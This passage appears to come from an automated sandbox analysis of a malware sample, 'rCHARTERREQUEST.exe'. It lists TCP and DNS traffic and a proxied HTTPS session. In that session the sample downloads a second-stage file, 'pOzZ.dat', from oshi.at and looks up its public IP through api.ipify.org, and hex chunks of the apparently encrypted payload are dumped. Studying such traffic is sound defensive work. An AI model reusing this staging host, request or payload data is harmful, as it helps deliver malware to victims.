                                                                                                        Jan 13, 2025 03:02:45.191549063 CET44350040194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:45.191703081 CET44350040194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:45.191735029 CET50040443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:45.194664955 CET50040443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:45.199347973 CET50040443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:45.218035936 CET50049443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:45.218095064 CET44350049194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:45.218261957 CET50049443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:45.221568108 CET50049443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:45.221599102 CET44350049194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:46.345577002 CET44350049194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:46.347369909 CET50049443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:46.347420931 CET44350049194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:46.908277988 CET44350049194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:46.908309937 CET44350049194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:46.908379078 CET44350049194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:46.908426046 CET50049443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:46.908477068 CET50049443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:46.909102917 CET50049443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:46.910460949 CET50050443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:46.910497904 CET44350050194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:46.911705017 CET50050443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:46.911990881 CET50050443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:46.912009001 CET44350050194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:48.037314892 CET44350050194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:48.039784908 CET50050443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:48.039815903 CET44350050194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:48.611924887 CET44350050194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:48.611972094 CET44350050194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:48.612144947 CET44350050194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:48.612220049 CET50050443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:48.612680912 CET50050443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:48.614598989 CET50051443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:48.614675999 CET44350051194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:48.614768982 CET50051443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:48.615016937 CET50051443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:48.615046978 CET44350051194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:50.309286118 CET44350051194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:50.312189102 CET50051443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:50.312228918 CET44350051194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:50.887968063 CET44350051194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:50.888021946 CET44350051194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:50.888113022 CET50051443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:50.888180017 CET44350051194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:50.888214111 CET44350051194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:50.888300896 CET50051443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:50.888703108 CET50051443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:50.890057087 CET50052443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:50.890140057 CET44350052194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:50.890244007 CET50052443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:50.890527010 CET50052443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:50.890559912 CET44350052194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:52.001117945 CET44350052194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:52.005323887 CET50052443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:52.005357027 CET44350052194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:52.584984064 CET44350052194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:52.585035086 CET44350052194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:52.585115910 CET50052443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:52.585150957 CET44350052194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:52.585177898 CET44350052194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:52.585231066 CET50052443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:52.585787058 CET50052443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:52.586927891 CET50053443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:52.586957932 CET44350053194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:52.587030888 CET50053443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:52.587280989 CET50053443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:52.587294102 CET44350053194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:53.697630882 CET44350053194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:53.699275970 CET50053443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:53.699289083 CET44350053194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:55.276859045 CET44350053194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:55.276906967 CET44350053194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:55.277059078 CET44350053194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:55.277142048 CET50053443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:55.277142048 CET50053443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:55.278021097 CET50053443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:55.279181957 CET50054443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:55.279223919 CET44350054194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:55.279299974 CET50054443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:55.279607058 CET50054443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:55.279623032 CET44350054194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:56.400791883 CET44350054194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:56.402601957 CET50054443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:56.402646065 CET44350054194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:56.961333990 CET44350054194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:56.961358070 CET44350054194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:56.961436033 CET44350054194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:56.961436033 CET50054443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:56.961787939 CET50054443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:56.975024939 CET50054443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:57.060946941 CET50055443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:57.060987949 CET44350055194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:57.061072111 CET50055443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:57.061381102 CET50055443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:57.061394930 CET44350055194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:58.162333965 CET44350055194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:58.167804003 CET50055443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:58.167821884 CET44350055194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:58.879105091 CET44350055194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:58.879158020 CET44350055194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:58.879232883 CET50055443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:58.879245996 CET44350055194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:58.879363060 CET44350055194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:58.879507065 CET50055443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:58.879822969 CET50055443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:58.880917072 CET50056443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:58.880975008 CET44350056194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:58.881052017 CET50056443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:58.881284952 CET50056443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:02:58.881306887 CET44350056194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:02:59.987261057 CET44350056194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:03:00.005254030 CET50056443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:03:00.005290031 CET44350056194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:03:00.582478046 CET44350056194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:03:00.582530975 CET44350056194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:03:00.582597017 CET50056443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:03:00.582628965 CET44350056194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:03:00.582720041 CET44350056194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:03:00.582839012 CET50056443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:03:00.583448887 CET50056443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:03:00.587340117 CET50057443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:03:00.587424994 CET44350057194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:03:00.587521076 CET50057443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:03:00.589715004 CET50057443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:03:00.589751005 CET44350057194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:03:04.712707043 CET44350057194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:03:04.714492083 CET50057443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:03:04.714554071 CET44350057194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:03:05.291528940 CET44350057194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:03:05.291578054 CET44350057194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:03:05.291680098 CET50057443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:03:05.291698933 CET44350057194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:03:05.291758060 CET50057443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:03:05.292402029 CET50057443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:03:05.293631077 CET50058443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:03:05.293695927 CET44350058194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:03:05.293767929 CET50058443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:03:05.294059038 CET50058443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:03:05.294079065 CET44350058194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:03:06.394097090 CET44350058194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:03:06.548233032 CET50058443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:03:07.304544926 CET50058443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:03:07.304600000 CET44350058194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:03:07.308017969 CET50058443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:03:07.308092117 CET44350058194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:03:07.308254957 CET50058443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:03:07.310038090 CET50059443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:03:07.310131073 CET44350059194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:03:07.314604998 CET50059443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:03:07.314604998 CET50059443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:03:07.314682007 CET44350059194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:03:08.440618992 CET44350059194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:03:08.440743923 CET50059443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:03:08.442924023 CET50059443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:03:08.442954063 CET44350059194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:03:08.443763018 CET44350059194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:03:08.445085049 CET50059443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:03:08.487329006 CET44350059194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:03:09.027520895 CET44350059194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:03:09.027568102 CET44350059194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:03:09.027703047 CET44350059194.15.112.248192.168.2.4
                                                                                                        Jan 13, 2025 03:03:09.027757883 CET50059443192.168.2.4194.15.112.248
                                                                                                        Jan 13, 2025 03:03:09.027757883 CET50059443192.168.2.4194.15.112.248

                                                                                                        UDP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Jan 13, 2025 03:00:58.818141937 CET5803853192.168.2.41.1.1.1
                                                                                                        Jan 13, 2025 03:00:58.826195002 CET53580381.1.1.1192.168.2.4
                                                                                                        Jan 13, 2025 03:01:25.358871937 CET5375153192.168.2.41.1.1.1
                                                                                                        Jan 13, 2025 03:01:25.365936041 CET53537511.1.1.1192.168.2.4

                                                                                                        DNS Queries

                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                        Jan 13, 2025 03:00:58.818141937 CET192.168.2.41.1.1.10x2a7eStandard query (0)oshi.atA (IP address)IN (0x0001)false
                                                                                                        Jan 13, 2025 03:01:25.358871937 CET192.168.2.41.1.1.10x345cStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false

                                                                                                        DNS Answers

                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                        Jan 13, 2025 03:00:58.826195002 CET1.1.1.1192.168.2.40x2a7eNo error (0)oshi.at194.15.112.248A (IP address)IN (0x0001)false
                                                                                                        Jan 13, 2025 03:01:25.365936041 CET1.1.1.1192.168.2.40x345cNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                        Jan 13, 2025 03:01:25.365936041 CET1.1.1.1192.168.2.40x345cNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                        Jan 13, 2025 03:01:25.365936041 CET1.1.1.1192.168.2.40x345cNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false

                                                                                                        HTTP Request Dependency Graph

                                                                                                        • oshi.at
                                                                                                        • api.ipify.org

                                                                                                        HTTPS Proxied Packets

                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.2.449732194.15.112.2484437388C:\Users\user\Desktop\rCHARTERREQUEST.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:01:00 UTC186OUTGET /cQXB HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        Connection: Keep-Alive
                                                                                                        2025-01-13 02:01:00 UTC317INHTTP/1.1 200 OK
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:01:00 GMT
                                                                                                        Content-Type: application/octet-stream
                                                                                                        Content-Length: 1128456
                                                                                                        Connection: close
                                                                                                        Last-Modified: Mon, 13 Jan 2025 00:05:26 GMT
                                                                                                        Accept-Ranges: bytes
                                                                                                        Content-Disposition: attachment; filename=pOzZ.dat
                                                                                                        ETag: "a0ade6f076fc1461b0227bc5cf8254b4"
                                                                                                        2025-01-13 02:01:00 UTC3766INData Raw: eb 86 d0 a7 6d 80 c2 f9 31 1a cc c0 61 58 e3 ef e7 bb dc 2a 53 77 aa 01 4e 53 fc 72 76 c2 eb 13 b9 5f 67 6d 7e bf cf aa 4d f2 95 02 3b b1 b8 13 57 3f 9c 57 a8 f4 ae 44 5b c7 f1 d8 64 8e 0a df b7 31 3b 90 83 88 d8 54 a7 9c d0 35 84 4d ea d6 d1 fe 63 f1 01 20 7f 8c 8f fe f1 58 e5 ae 5c 23 86 19 5d 0c 9d 32 e0 ca e1 9a 30 bb 9c 3d c5 7c 3f b0 ef 04 63 6f 8b d6 dd 3f 0f ea df e6 84 49 07 ca 2e e4 99 8a 0e 52 37 39 b1 18 d4 57 23 fc 9c b5 04 8f 3d f6 e4 31 3d 5a bb ba 1b b8 57 d9 41 1d 4b fa b6 69 c5 2d 24 4a 49 a8 20 cf 39 84 f5 a2 7e a5 1d 77 5f 19 04 53 76 34 f7 08 e5 72 90 77 93 1b 37 ca 54 c9 51 be eb 9c 00 aa 52 a1 e3 43 1c b3 9b 1e 04 2f df 64 3e 6b 30 ff 80 2d b6 7e b9 21 8f 2e 75 72 47 51 99 44 a8 8c fd 0c e7 be 0c b2 97 0c d3 fe aa d6 a3 24 57 ee fd
                                                                                                        Data Ascii: m1aX*SwNSrv_gm~M;W?WD[d1;T5Mc X\#]20=|?co?I.R79W#=1=ZWAKi-$JI 9~w_Sv4rw7TQRC/d>k0-~!.urGQD$W
                                                                                                        2025-01-13 02:01:00 UTC4096INData Raw: b2 e4 dd 63 21 a9 98 9a d0 d0 9f 07 e3 15 dc b2 d0 c6 71 b3 a2 7f 06 5f 85 17 c8 e2 4f 96 33 e2 10 dd 72 8c 3b 9d 21 3e a4 e8 e2 9f 74 43 66 8d cb 08 2f 66 a3 6f d5 f2 15 e6 d9 0b 62 69 3e c4 3c 8c d0 87 a0 35 55 e8 cc 18 8a d3 5f 9f ea 6f f2 5c 01 40 3e fa f1 80 30 6d d1 99 c3 90 6f 5e e8 23 0a 50 f5 07 9b 9b 4c cd 6c a3 2b f7 a6 30 20 ef 23 8b b5 75 b9 59 6f b3 dd a2 74 46 dd 91 c9 d1 4e 1a 44 5e f9 58 4e f2 0c b3 be 7e 82 41 89 d6 01 38 bb 99 f4 66 cd 07 c6 a9 22 e6 06 62 1d c6 2c 36 96 7f 48 20 3a 1f fb 51 65 c9 b5 82 a6 0c 8c f5 54 5f 4a 0b 1f 6e bf 96 24 ec 82 5c 3d bf 2a df c2 06 bb aa b6 3c d6 36 d6 fa 4f f6 34 1a 9f 23 c9 b4 62 1f 41 db c6 54 ab ac 80 02 2f da 25 3a 90 79 8f 4a 80 e3 96 52 c7 0b 9d db 49 39 97 66 6b c7 ac b0 7b 24 b6 93 c9 06 50
                                                                                                        Data Ascii: c!q_O3r;!>tCf/fobi><5U_o\@>0mo^#PLl+0 #uYotFND^XN~A8f"b,6H :QeT_Jn$\=*<6O4#bAT/%:yJRI9fk{$P
                                                                                                        2025-01-13 02:01:00 UTC4096INData Raw: 84 8a 12 29 98 fb 25 91 27 a2 bb df 9d 33 dd 98 4d 87 22 f4 50 38 94 f9 2e c8 4e d3 05 cb 10 6b da 2e 53 26 8c 93 84 52 30 18 c6 36 a8 64 ca 58 48 37 45 33 e6 c7 78 a5 41 07 0a 85 49 25 58 cf d2 6f eb eb a8 e9 f2 c1 28 84 cb b4 57 58 ea 24 e7 71 22 e9 19 e2 7e 62 af 32 61 3e 4c 29 85 2e f5 17 e6 d8 4e 40 53 8f 38 19 8d e1 4f 7a 6c d4 fe 41 d5 0a a6 af 58 a6 79 cf 9c e4 8b 99 24 2a dc 66 bc f4 2d 3c 17 98 43 bd 92 e3 1e 7a 14 27 9e 99 9c ff 76 06 b7 01 f8 54 88 b7 ec 0c 02 a2 0a 1b e3 a8 a5 c6 9c c2 1b af 40 0e 0a b3 46 92 2a 3e 36 d8 fc fe 32 22 b2 7b 1d 62 9b 73 8d b6 fd bb e9 d9 98 5e 7f 14 8f 85 d0 1b 80 cd 6d 37 38 e1 2c cf f7 7f d7 43 ba c3 8e d3 7c 3f 63 cb dc 08 5d d0 18 e4 dc 60 c1 5b f8 fb 61 40 0b 03 f3 fc 58 33 b5 bf 15 e7 74 00 c8 75 38 47 f6
                                                                                                        Data Ascii: )%'3M"P8.Nk.S&R06dXH7E3xAI%Xo(WX$q"~b2a>L).N@S8OzlAXy$*f-<Cz'vT@F*>62"{bs^m78,C|?c]`[a@X3tu8G
                                                                                                        2025-01-13 02:01:00 UTC4096INData Raw: 92 cc af 54 9b 90 13 6a c7 7f 11 39 ad 13 e3 8f 88 02 c7 ae 4f f8 5b 05 b2 23 14 77 50 f6 88 57 5a a9 6b f6 ca 8c dd 29 32 8f 07 b3 c3 f5 b0 01 77 f6 0b 04 33 36 5f 33 3a df 78 77 aa c5 91 07 c2 bd 25 16 e6 8a 2f 1e e1 c1 16 d2 6c bd eb 2f 8b d7 0b 6a 1b 58 e3 5c 85 68 da 8e 9a 5a 89 ca b0 1d 7f b6 c2 3a 02 18 5b a2 7b 80 59 fd 65 79 1b 47 a7 b4 68 e5 14 42 25 34 ca 30 32 fb df 96 42 e2 66 62 1d 73 be 2f fd 48 d9 c6 aa 73 1c 65 28 f6 cf 41 2c 64 65 a4 8d 46 2b e1 4a ef e6 3d 8a f0 2c e3 5d a7 30 a8 18 da 0d da 39 07 cf f0 c3 2d 45 28 51 01 57 d5 0f 0c aa 25 88 83 db 8d 63 20 da 9d 2b f5 48 89 fc 5c 84 2f 03 4e aa 8e 18 f6 94 a3 0c 65 c6 73 9c 78 ac 59 f1 d9 97 f5 83 16 a8 76 8c 87 a4 28 5b 67 dc ca 94 bb 47 ca 5a c8 3e 7f 18 58 8e 84 1f a1 f0 db c0 90 f8
                                                                                                        Data Ascii: Tj9O[#wPWZk)2w36_3:xw%/l/jX\hZ:[{YeyGhB%402Bfbs/Hse(A,deF+J=,]09-E(QW%c +H\/NesxYv([gGZ>X
                                                                                                        2025-01-13 02:01:00 UTC4096INData Raw: 90 99 1f af f9 6e 0f 0f 21 d5 91 09 e5 7f 03 80 a2 49 30 1a 14 2a 66 21 87 ca 61 8d 48 36 e3 4c 56 46 88 4b c1 50 20 a5 84 3b 58 60 01 78 ed 7d f7 fa aa 69 19 97 9f d9 df 02 09 53 da a4 de 9b b1 50 aa 84 f4 f5 df 06 68 b7 09 d9 a0 0f 1e 29 8e 87 d1 a6 17 59 50 49 99 76 09 fb 26 25 90 73 e9 67 45 d5 67 17 d7 df 09 77 30 c3 d8 bc 99 e1 76 5b 6f 29 31 97 98 59 b5 59 33 80 e5 0e 46 ee a2 c5 c4 95 df 55 f9 36 e2 32 34 b3 44 2e 49 21 0c e3 d2 55 4b 16 96 66 13 14 17 0d 23 12 78 e6 61 dd 95 a1 b8 44 4d 3e 1b 35 e5 cf 25 80 f2 b0 be 8c 68 c8 bd a4 14 d7 69 0d 90 19 87 93 44 d8 f3 ee d8 c8 fa 62 34 86 a4 20 ba e6 83 5f 96 93 0a 35 79 3d 2f c1 e9 99 c3 c6 94 fd 57 72 2e 44 dc ad 3f f6 c7 a1 37 1c 51 33 10 4b 2e 6b 38 5e b1 6c aa 06 2f 02 59 8b b4 77 f7 04 70 33 84
                                                                                                        Data Ascii: n!I0*f!aH6LVFKP ;X`x}iSPh)YPIv&%sgEgw0v[o)1YY3FU624D.I!UKf#xaDM>5%hiDb4 _5y=/Wr.D?7Q3K.k8^l/Ywp3
                                                                                                        2025-01-13 02:01:00 UTC4096INData Raw: 3a 40 b9 9a 85 7c 2c 81 ed b0 c4 03 71 51 56 5e fd 3c d9 7c 0c 69 9e f5 55 7a 18 ed 6c 27 b2 5d d2 b0 0e 2c a4 fc 38 54 63 7c 6e 73 df 12 6d 55 d7 dd a6 61 44 20 60 cb a2 74 e0 b0 8f a7 5d 38 48 cc 18 1b 20 d5 9f 63 83 73 56 29 35 bb 98 60 9f de 20 d3 9c d7 3f e8 60 14 9d 5d 89 e9 c8 fa ad 10 9f 95 cc d5 da 4c b2 65 2c 63 d6 be 26 a2 69 40 9a eb 60 01 0f c9 30 bb 13 a8 61 8b ab a8 7f a2 5b 4a 3c 35 33 92 b2 af 9f d9 20 f9 c4 8b de 1f 0e 32 03 97 67 62 c0 59 d4 b8 df 7e 01 8e 7d 06 56 f2 40 e9 58 94 be 62 a3 c3 e1 5a c9 46 68 13 b1 58 c2 f1 3d 86 d5 08 09 10 3a 21 69 4b 3c 7f a9 07 e8 5a d0 72 15 eb 71 ef 4f 71 86 5e ac a3 c0 e6 fb b7 6c 06 d4 39 e1 6f d4 44 b9 b2 cf 94 56 c7 58 5b 32 2c a7 9f 82 39 38 fd 08 87 7a 1d 10 d1 6f e1 8b 64 63 ca e7 96 69 e7 bb
                                                                                                        Data Ascii: :@|,qQV^<|iUzl'],8Tc|nsmUaD `t]8H csV)5` ?`]Le,c&i@`0a[J<53 2gbY~}V@XbZFhX=:!iK<ZrqOq^l9oDVX[2,98zodci
                                                                                                        2025-01-13 02:01:00 UTC4096INData Raw: 5b 9f 7b 50 b0 10 23 bd c6 1b e3 55 c6 4f a2 14 35 52 e4 03 42 09 8a f7 cf f6 7c 36 14 c1 34 bf 59 8a 63 20 6a b1 0d 64 85 99 aa 87 d6 68 f6 d1 0d 72 80 4b 6c 01 48 bd b7 b7 d6 4a 6a 40 e9 62 8a b4 70 1a ae b2 3e 00 73 2c 62 db 01 18 d4 55 aa 51 83 90 51 41 4c 31 b2 5a 38 6f 68 f0 3f 59 af b3 8c f8 13 e0 70 ab b4 39 18 7a ea 58 93 b1 72 a9 a2 d8 38 87 e1 0c 74 14 b4 cb cd 44 2c 62 ab d4 e7 3d 20 95 37 04 f3 eb 21 93 95 1c 96 33 0d 50 da c0 f1 58 9c 00 b9 ea ca 7e 74 3f 9a ff f0 44 fc 75 a8 75 5b dc 3f 85 c6 f1 68 37 a2 6f e7 27 9d ff 9c 75 c3 1c a9 2b d9 6f 67 0f 19 93 f5 12 58 2a f6 a9 41 88 e1 6e c7 ee 20 05 19 5c 90 ed e3 de bd 9b 04 78 78 7d d4 18 ea 63 33 b9 c6 15 ca 9c fe 7f f0 78 e1 9a 1d 02 34 b5 03 1f b8 9b 6a 41 c0 68 88 e9 56 f2 a6 11 18 c4 a6
                                                                                                        Data Ascii: [{P#UO5RB|64Yc jdhrKlHJj@bp>s,bUQQAL1Z8oh?Yp9zXr8tD,b= 7!3PX~t?Duu[?h7o'u+ogX*An \xx}c3x4jAhV
